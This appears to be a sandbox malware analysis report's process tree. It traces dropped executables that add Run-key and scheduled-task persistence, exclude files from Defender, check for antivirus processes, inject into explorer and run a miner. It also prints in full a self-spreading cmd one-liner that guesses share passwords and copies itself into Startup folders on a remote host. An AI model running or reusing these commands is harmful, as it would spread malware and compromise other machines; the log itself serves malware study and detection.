C:\Users\Admin\Desktop\a\test21.exe"C:\Users\Admin\Desktop\a\test21.exe"3⤵
- Executes dropped EXE
PID:5656
-
-
C:\Users\Admin\Desktop\a\test22.exe"C:\Users\Admin\Desktop\a\test22.exe"3⤵
- Executes dropped EXE
PID:5748
-
-
C:\Users\Admin\Desktop\a\test8.exe"C:\Users\Admin\Desktop\a\test8.exe"3⤵
- Executes dropped EXE
PID:5828
-
-
C:\Users\Admin\Desktop\a\test7.exe"C:\Users\Admin\Desktop\a\test7.exe"3⤵
- Executes dropped EXE
PID:5928
-
-
C:\Users\Admin\Desktop\a\test-again.exe"C:\Users\Admin\Desktop\a\test-again.exe"3⤵
- Executes dropped EXE
PID:6036
-
-
C:\Users\Admin\Desktop\a\test17.exe"C:\Users\Admin\Desktop\a\test17.exe"3⤵
- Executes dropped EXE
PID:6132
-
-
C:\Users\Admin\Desktop\a\vg9qcBa.exe"C:\Users\Admin\Desktop\a\vg9qcBa.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5328 -
C:\Users\Admin\Desktop\a\vg9qcBa.exe"C:\Users\Admin\Desktop\a\vg9qcBa.exe"4⤵
- Executes dropped EXE
PID:5536
-
-
C:\Users\Admin\Desktop\a\vg9qcBa.exe"C:\Users\Admin\Desktop\a\vg9qcBa.exe"4⤵
- Executes dropped EXE
PID:5544
-
-
C:\Users\Admin\Desktop\a\vg9qcBa.exe"C:\Users\Admin\Desktop\a\vg9qcBa.exe"4⤵
- Executes dropped EXE
PID:5556
-
-
-
C:\Users\Admin\Desktop\a\win.exe"C:\Users\Admin\Desktop\a\win.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6240 -
C:\Windows\SysWOW64\route.exeroute print4⤵PID:6512
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.127.0.14⤵
- Network Service Discovery
PID:6996
-
-
-
C:\Users\Admin\Desktop\a\x4lburt.exe"C:\Users\Admin\Desktop\a\x4lburt.exe"3⤵
- Adds Run key to start application
PID:5848 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6384 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5744 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 4006⤵
- Program crash
PID:2436
-
-
-
-
-
C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"3⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:6128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\grjujyNaBLaKbU.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:8608 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:3884
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp16B2.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:8640 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:8660
-
-
-
C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"4⤵PID:2764
-
-
-
C:\Users\Admin\Desktop\a\7mpPLxE.exe"C:\Users\Admin\Desktop\a\7mpPLxE.exe"3⤵
- Suspicious use of SetThreadContext
PID:5688 -
C:\Users\Admin\Desktop\a\7mpPLxE.exe"C:\Users\Admin\Desktop\a\7mpPLxE.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6148
-
-
-
C:\Users\Admin\Desktop\a\0fVlNye.exe"C:\Users\Admin\Desktop\a\0fVlNye.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3328 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd4⤵
- System Location Discovery: System Language Discovery
PID:1196 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:4864
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:7608
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:7968
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵PID:6060
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 294425⤵PID:7256
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l5⤵PID:7952
-
-
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comReynolds.com l5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:7188 -
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comC:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com6⤵
- Suspicious use of SetThreadContext
PID:7644 -
C:\Windows\explorer.exeexplorer.exe7⤵PID:7360
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4364
-
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:8084
-
-
-
-
C:\Users\Admin\Desktop\a\IMG001.exe"C:\Users\Admin\Desktop\a\IMG001.exe"3⤵
- Checks computer location settings
PID:7664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe4⤵PID:6560
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe5⤵
- Kills process with taskkill
PID:3592
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4560
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Enumerates connected drives
- NTFS ADS
PID:8112 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe5⤵PID:7860
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe6⤵
- Kills process with taskkill
PID:7472
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"5⤵PID:9144
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ5⤵PID:2556
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:2476
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ6⤵
- Adds Run key to start application
PID:8220
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5940 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:6176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:8232
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵
- System Location Discovery: System Language Discovery
PID:6340 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:6212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:7476
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0005⤵
- Power Settings
PID:6808 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:1924
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 06⤵
- Power Settings
PID:8380
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 06⤵
- Power Settings
PID:8408
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0006⤵
- Power Settings
PID:8480
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0205& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))5⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:8224 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"6⤵
- Network Service Discovery
PID:9656 -
C:\Windows\SysWOW64\net.exenet view7⤵
- Discovers systems in the same network
PID:9676
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"7⤵
- System Location Discovery: System Language Discovery
PID:9692
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a7⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
PID:8744
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"7⤵PID:8404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_6⤵PID:10032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\136.243.76.21|find /i " "6⤵
- System Location Discovery: System Language Discovery
PID:9980 -
C:\Windows\SysWOW64\net.exenet view \\136.243.76.217⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:9908
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵PID:9880
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:4396
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:9300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:9296 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:9224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6048
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:8576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9328
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:9700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:9596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9556
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:9664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:10024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2084
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:2964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:10040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9732
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:9452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:9416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:10152
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:10048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:9464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:940
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:9840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:7892 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:8692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:9828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9956
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:9084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:7300 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:8768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\1\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:7636 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1960
-
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:7092
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:10068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9768
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3160
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:9620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5424
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9792
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:6312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9308
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:9852
-
-
